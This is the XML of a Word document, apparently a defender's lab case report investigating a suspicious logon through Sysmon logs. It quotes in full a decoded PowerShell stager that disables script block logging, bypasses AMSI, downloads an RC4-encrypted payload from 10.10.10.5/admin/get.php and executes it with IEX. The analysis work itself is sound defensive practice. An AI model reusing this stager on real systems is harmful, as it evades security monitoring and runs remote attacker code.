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F090" w14:textId="7F413BF8" w:rsidR="008A6FD6" w:rsidRDefault="007608D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Credential access logon case report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AA31EA" w14:textId="77777777" w:rsidR="007608D2" w:rsidRDefault="007608D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745145CC" w14:textId="77777777" w:rsidR="007608D2" w:rsidRPr="007608D2" w:rsidRDefault="007608D2" w:rsidP="007608D2">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it is logon case start with the keyword search logon. </w:t>
      </w:r>
      <w:r w:rsidRPr="007608D2">
        <w:t>Microsoft-Windows-Sysmon/Operational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F1E1F" w14:textId="066A21BD" w:rsidR="007608D2" w:rsidRDefault="007608D2">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Is legit and </w:t>
      </w:r>
      <w:r w:rsidRPr="007608D2">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not default . note task id </w:t>
      </w:r>
      <w:r w:rsidRPr="007608D2">
        <w:t>106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2E8B4" w14:textId="0A2C6CDB" w:rsidR="007608D2" w:rsidRDefault="007608D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6558BBF0" wp14:editId="69D29DBD">
            <wp:extent cx="5731510" cy="5015230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12172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65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3B14" w14:textId="77777777" w:rsidR="007608D2" w:rsidRDefault="007608D2"/>
    <w:p w14:paraId="2AE812DC" w14:textId="32FD558A" w:rsidR="007608D2" w:rsidRDefault="007608D2" w:rsidP="007608D2">
      <w:r>
        <w:t xml:space="preserve">Search with task </w:t>
      </w:r>
      <w:r w:rsidRPr="007608D2">
        <w:t>106</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and observed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> executes a encoded command .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695B54ED" w14:textId="12B210DD" w:rsidR="007608D2" w:rsidRPr="007608D2" w:rsidRDefault="007608D2" w:rsidP="007608D2">
      <w:r w:rsidRPr="007608D2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="543DA5A8" wp14:editId="478581AB">
            <wp:extent cx="5731510" cy="3324225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="101857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75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14FF" w14:textId="50554A02" w:rsidR="007608D2" w:rsidRDefault="007608D2">
      <w:r>
        <w:t xml:space="preserve">Decoded encoded content with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyberchef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and there is download data with 2 variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1163DA0B" w14:textId="128F8015" w:rsidR="007608D2" w:rsidRDefault="007608D2">
      <w:r w:rsidRPr="007608D2">
        <w:t>IF($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007608D2">
        <w:t>PSVeRSiONTablE.PSVersiON.MaJOr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007608D2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007608D2">
        <w:t>gE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007608D2">
        <w:t xml:space="preserve"> 3){$939=[REf].ASsEmbly.GeTTYpe('System.Management.Automation.Utils')."GeTFiE`LD"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($939){$790=$939.GeTVALUe($NuLL);IF($790['ScriptB'+'lockLogging']){$790['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$790['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[ColLECtioNS.GENerIc.DICtIOnArY[strIng,SYStEM.OBjeCt]]::new();$val.Add('EnableScriptB'+'lockLogging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$790['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$Val}ElSe{[SCrIPtBLocK]."GetFIe`lD"('signatures','N'+'onPublic,Static').SetVAluE($NULL,(New-OBJeCt COLlecTiONS.GeneRic.HAsHSEt[STrInG]))}$REF=[Ref].ASsEMbLY.GetTypE('System.Management.Automation.Amsi'+'Utils');$ReF.GeTFIeLD('amsiInitF'+'ailed','NonPublic,Static').SEtVAlUe($nuLl,$truE);};[SYStem.NeT.SeRViCEPoinTMaNAgeR]::Expect100CoNTInue=0;$55F=NEw-OBJEcT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007608D2">
        <w:t>SYsTeM.NeT.WebClIenT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007608D2">
        <w:t>;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'</w:t>
      </w:r>
      <w:r w:rsidRPr="007608D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;$ser=$([TEXT.EnCOdIng]::UNicOde.GeTSTRING([COnvErt]::FromBaSE64STRInG('aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==')));$t='/admin/get.php'</w:t>
      </w:r>
      <w:r w:rsidRPr="007608D2">
        <w:t>;$55f.HEADERS.Add('User-Agent',$u);$55F.PROxY=[SyStEM.NeT.WEbReQuEST]::DeFaULTWebPROXY;$55F.PROXY.CREdEntIAlS = [SySTEm.NeT.CREdEntIalCache]::DeFaulTNetwoRKCREdenTIAlS;$Script:Proxy = $55f.Proxy;$K=[SySTEM.TeXT.EncODInG]::ASCII.GEtByTeS('k)gJ%x1^SDUG!uKm?Lv*be[-oiy/4wT|');$R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXor$S[($S[$I]+$S[$H])%256]}};$55f.HEadErS.Add("Cookie","sVxjBpEu=5EjEI0lE5WX0PtRaD/AK5ROPVxU=");$DATA=$55f.</w:t>
      </w:r>
      <w:r w:rsidRPr="007608D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DowNLoADDaTA($seR+$T)</w:t>
      </w:r>
      <w:r w:rsidRPr="007608D2">
        <w:t>;$Iv=$DATa[0..3];$dAta=$DATA[4..$DAta.lENGtH];-jOIn[CHAR[]](&amp; $R $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007608D2">
        <w:t>dAta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007608D2">
        <w:t xml:space="preserve"> ($IV+$K))|IEX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF3CF01" w14:textId="77777777" w:rsidR="007608D2" w:rsidRDefault="007608D2"/>
    <w:p w14:paraId="490DCC9E" w14:textId="3141172B" w:rsidR="007608D2" w:rsidRDefault="007608D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007608D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">     coverts to </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="003D3FA4" w:rsidRPr="00C14138">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="003D3FA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>[</w:t>
        </w:r>
        <w:r w:rsidR="003D3FA4" w:rsidRPr="00C14138">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>:</w:t>
        </w:r>
        <w:r w:rsidR="003D3FA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>]</w:t>
        </w:r>
        <w:r w:rsidR="003D3FA4" w:rsidRPr="00C14138">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>//10.10.10.5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62DB0E7C" w14:textId="77777777" w:rsidR="003D3FA4" w:rsidRDefault="003D3FA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC87B2F" w14:textId="4476AAE3" w:rsidR="003D3FA4" w:rsidRPr="003D3FA4" w:rsidRDefault="003D3FA4">
      <w:r w:rsidRPr="003D3FA4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">after adding the remaining variable we get </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003D3FA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http[:]//10.10.10.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3FA4">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3FA4">
        <w:t>/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3FA4">
        <w:t>get.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3FA4">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B0C26C" w14:textId="77777777" w:rsidR="003D3FA4" w:rsidRPr="003D3FA4" w:rsidRDefault="003D3FA4"/>
    <w:p w14:paraId="36834D25" w14:textId="7914AF29" w:rsidR="003D3FA4" w:rsidRPr="003D3FA4" w:rsidRDefault="003D3FA4">
      <w:r w:rsidRPr="003D3FA4">
        <w:t xml:space="preserve">search for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3FA4">
        <w:t>get.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3FA4">
        <w:t xml:space="preserve"> file and check is it accessed or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E87C93A" w14:textId="77777777" w:rsidR="003D3FA4" w:rsidRDefault="003D3FA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A35946" w14:textId="43D68E73" w:rsidR="003D3FA4" w:rsidRDefault="003D3FA4">
      <w:r w:rsidRPr="003D3FA4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1923A83F" wp14:editId="5ED41BA3">
            <wp:extent cx="5731510" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="13365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10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719C" w14:textId="77777777" w:rsidR="003D3FA4" w:rsidRDefault="003D3FA4"/>
    <w:p w14:paraId="2657AE2C" w14:textId="6CCB4BB5" w:rsidR="003D3FA4" w:rsidRDefault="003D3FA4">
      <w:r>
        <w:t xml:space="preserve">There is no action after the access attempt in provided evidence. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA54A5" w14:textId="77777777" w:rsidR="003D3FA4" w:rsidRDefault="003D3FA4"/>
    <w:p w14:paraId="465EB991" w14:textId="0C37C827" w:rsidR="003D3FA4" w:rsidRDefault="003D3FA4">
      <w:r>
        <w:t>Overall activity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5FE4FB" w14:textId="71F583C7" w:rsidR="003D3FA4" w:rsidRDefault="003D3FA4">
      <w:r>
        <w:t xml:space="preserve">The logon process leads to execution of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encoded content and after decoding observed it is access</w:t>
      </w:r>
      <w:r w:rsidR="00CF1B90">
        <w:t xml:space="preserve">ing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file on internal host. No post activity observed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AE450" w14:textId="77777777" w:rsidR="007608D2" w:rsidRDefault="007608D2"/>
    <w:p w14:paraId="78774750" w14:textId="77777777" w:rsidR="007608D2" w:rsidRPr="007608D2" w:rsidRDefault="007608D2"/>
    <w:sectPr w:rsidR="007608D2" w:rsidRPr="0076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D2"/>
    <w:rsid w:val="003D3FA4"/>
    <w:rsid w:val="007608D2"/>
    <w:rsid w:val="007742D8"/>
    <w:rsid w:val="008A6FD6"/>
    <w:rsid w:val="00B332B0"/>
    <w:rsid w:val="00CF1B90"/>
    <w:rsid w:val="00D11E3E"/>
    <w:rsid w:val="00D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02A6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{919A68BC-890A-467D-8413-91988128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F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F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10.10.10.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10.10.5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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-18T05:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-18T06:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>